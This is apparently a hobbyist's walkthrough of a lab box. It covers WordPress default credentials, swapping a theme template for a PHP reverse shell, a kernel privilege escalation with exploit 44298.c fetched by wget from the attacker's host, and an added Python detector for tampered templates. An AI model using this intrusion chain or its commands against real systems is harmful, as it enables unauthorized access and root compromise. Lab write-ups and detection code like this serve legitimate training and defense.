This was my first intermediate box without reading the walkthrough for hints so I’m a little stoked.
I just leveraged all I learned on the beginner VMs and got through it in about 3 hours of mostly focused attention. (e.g., over breakfast and coffee.)

1. Scan revealed tcp/80
2. dirb revealed WordPress
3. wpscan revealed usernames with easily guessed passwords of admin/admin, and with that I changed root's (in WordPress only) to password
4. Metasploit has a module for placing a php-reverse-shell.php.
!! This is good to know but for some reason it failed to authenticate using known good credentials. Will be useful for next time when I'm not sure where to put the reverse-php-shell.php.
5. msf> was not authenticating with WordPress: username/pass/targetURI are correct but it fails to authenticate.
6. Since I can edit templates on the WordPress site as an admin, I edited author.php, replacing its contents with php-reverse-shell.php contents after adding my local IP/port. (Socket)
7. Refreshed the page and Success! Shell! Now escalate privs.
8. $cat /home/btrisk/local.txt for the first flag
9. Was checking for suid binaries but Linux ubuntu 4.4.0-62 is vulnerable to 44298.c (Searchsploit 4.4.0- to find it.) BTW, searchsploit searches exploit-db.com for exploits for whatever string you enter. Very useful.
10. It recommended exploit 44298.c, so copy it, run #gcc, stick in /var/www/html/sploit and call it with wget from remote host. (wget 192.168.111.44/sploit)
11. Chmod +x sploit and boom! Rootshell!
12. #cat /root/proof.txt for 2nd flag!
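
From the defender's side, steps 6 and 7 work because the dashboard theme editor was enabled and nothing noticed author.php changing. The Python check below is an added example, not part of the original write-up: it tests whether wp-config.php sets WordPress's `DISALLOW_FILE_EDIT` constant and flags theme templates that both open a socket and spawn a process. The sample site, its file contents and the function names are constructed for illustration, and a standard WordPress layout is assumed.

```python
import re
import tempfile
from pathlib import Path

# A theme template that both opens a socket and spawns a process is the
# typical footprint of a PHP reverse shell pasted over a template.
SOCKET_CALLS = re.compile(r"\b(fsockopen|pfsockopen|socket_create|stream_socket_client)\s*\(")
EXEC_CALLS = re.compile(r"\b(proc_open|shell_exec|passthru|popen|system|exec)\s*\(")
FILE_EDIT_OFF = re.compile(
    r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE)

def file_edit_disabled(wp_config_text):
    """True if wp-config.php turns off the dashboard theme/plugin editor."""
    for line in wp_config_text.splitlines():
        stripped = line.lstrip()
        if stripped.startswith(("//", "#", "/*", "*")):
            continue  # a commented-out define does not count
        if FILE_EDIT_OFF.search(stripped):
            return True
    return False

def suspicious_templates(theme_dir):
    """Sorted relative paths of PHP files that open a socket and spawn a process."""
    hits = []
    for path in Path(theme_dir).rglob("*.php"):
        text = path.read_text(errors="replace")
        if SOCKET_CALLS.search(text) and EXEC_CALLS.search(text):
            hits.append(path.relative_to(theme_dir).as_posix())
    return sorted(hits)

def build_sample_site(root):
    """Constructed sample: one clean template, one tampered, editor left enabled."""
    theme = Path(root) / "wp-content" / "themes" / "sample"
    theme.mkdir(parents=True)
    (theme / "index.php").write_text("<?php get_header(); the_content(); get_footer();\n")
    (theme / "author.php").write_text(  # inert fragment, indicators only
        "<?php $s = fsockopen($ip, $port); $p = proc_open('/bin/sh', $d, $pipes);\n")
    (Path(root) / "wp-config.php").write_text(
        "<?php\n// define('DISALLOW_FILE_EDIT', true);\ndefine('WP_DEBUG', false);\n")
    return theme

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        theme = build_sample_site(root)
        config = (Path(root) / "wp-config.php").read_text()
        print("theme editor disabled:", file_edit_disabled(config))
        print("suspicious templates:", suspicious_templates(theme))
```

String matching like this is a triage aid; comparing theme files against known-good hashes from the theme's release is the stronger check.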

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.